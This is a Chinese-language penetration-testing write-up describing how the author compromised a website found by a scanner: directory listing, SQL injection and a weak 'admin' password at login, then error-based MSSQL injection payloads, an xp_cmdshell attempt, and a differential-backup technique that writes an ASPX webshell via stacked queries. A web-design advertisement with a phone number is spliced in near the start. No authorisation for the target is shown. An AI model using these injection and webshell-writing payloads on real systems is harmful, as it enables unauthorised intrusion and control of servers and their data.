0x00 前言

掃描器掃到了某個網(wǎng)站存在目錄瀏覽，于是便有了本文。。。

創(chuàng)新互聯(lián)公司從2013年創(chuàng)立，是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司，擁有項(xiàng)目網(wǎng)站設(shè)計、網(wǎng)站制作網(wǎng)站策劃，項(xiàng)目實(shí)施與項(xiàng)目整合能力。我們以讓每一個夢想脫穎而出為使命，1280元大興做網(wǎng)站,已為上家服務(wù),為大興各地企業(yè)和個人服務(wù),聯(lián)系電話:18980820575

知識點(diǎn)科普：

1. 目錄瀏覽

目錄瀏覽在我個人看來是危害較大的一個漏洞，該漏洞是指“在沒有默認(rèn)文檔的目錄下，列出該目錄下所有文件名及文件信息”，如果站點(diǎn)存在這種錯誤配置，***者如果知道其中目錄名，則可以查看到這些目錄下的文件。

2.差異備份條件

1. 站點(diǎn)絕對路徑
2. 具有路徑寫入權(quán)限
3. 具備當(dāng)前數(shù)據(jù)庫權(quán)限

0x01 正文

站點(diǎn)配置不當(dāng)，導(dǎo)致目錄瀏覽，通過查看首頁的源代碼，翻到了幾個目錄


隨便訪問了一個，發(fā)現(xiàn)會報錯，說明網(wǎng)站管理員并沒有把錯誤信息屏蔽

還存在信息泄漏。。

但是通常目錄下的文件是需要傳遞參數(shù)去執(zhí)行的，我們并不知道參數(shù)名，所以并沒辦法利用

輾轉(zhuǎn)后到前臺登錄界面查看

嘗試了一下，發(fā)現(xiàn)密碼處存在注入和弱口令admin，也就是可以用萬能密碼登錄啦
本來想找一處文件上傳，直接getshell，但是發(fā)現(xiàn)好像不存在，卻發(fā)現(xiàn)了網(wǎng)站使用了kindeditor和網(wǎng)站絕對路徑

那么前面登錄口處存在注入，后臺一般也有很多注入的啦，嘗試找一下，如果有的話，配合絕對路徑可以進(jìn)行g(shù)etshell

okok，發(fā)現(xiàn)注入啦，但到目前為止并不知道數(shù)據(jù)庫是什么類型，一般aspx+mssql，由于前面發(fā)現(xiàn)是可以報錯的，那么嘗試使用mssql的報錯方式

%' and 1=@@version --a

mssql數(shù)據(jù)庫，查看一下當(dāng)前的用戶身份

%' and 1=user --a

dbo的權(quán)限并不是sa，嘗試一下xp_cmdshell

%';exec('master..xp_cmdshell whoami') --a

并沒有開啟xp_cmdshell，且dbo的權(quán)限是不足以開啟xp_cmdshell的，那么只能嘗試使用差異備份的方式來寫入一個webshell

1. 獲取當(dāng)前數(shù)據(jù)庫名稱

%' and 1=db_name() --a

2. 對當(dāng)前數(shù)據(jù)庫進(jìn)行備份

%';backup database 數(shù)據(jù)庫名稱 to disk = '絕對路徑' with init --a 

如果成功備份，則網(wǎng)頁返回%'的查詢結(jié)果（因?yàn)槭嵌询B且后面語句的執(zhí)行并不會有返回結(jié)果）

3.創(chuàng)建表格，并寫入webshell

%';create table cmd(a image) --a
%';insert into cmd(a) values (0xxxxx) --a  //webshell的hex值

可以用網(wǎng)上的工具，筆者用以前自己開發(fā)的小工具

4.進(jìn)行第二次備份

%';backup log 數(shù)據(jù)庫名稱 to disk = '絕對路徑\\abc.aspx'--

這里我將webshell寫入子目錄中，因?yàn)橛心夸洖g覽，能確切看到文件是否產(chǎn)生

創(chuàng)建成功后，嘗試連接

0x02 后續(xù)

1. 如果能直接使用xp_cmdshell就盡量不要使用差異備份，因?yàn)闀a(chǎn)生備份文件，如果數(shù)據(jù)庫很大的話，會造成影響
   
2. 有任何錯誤，請斧正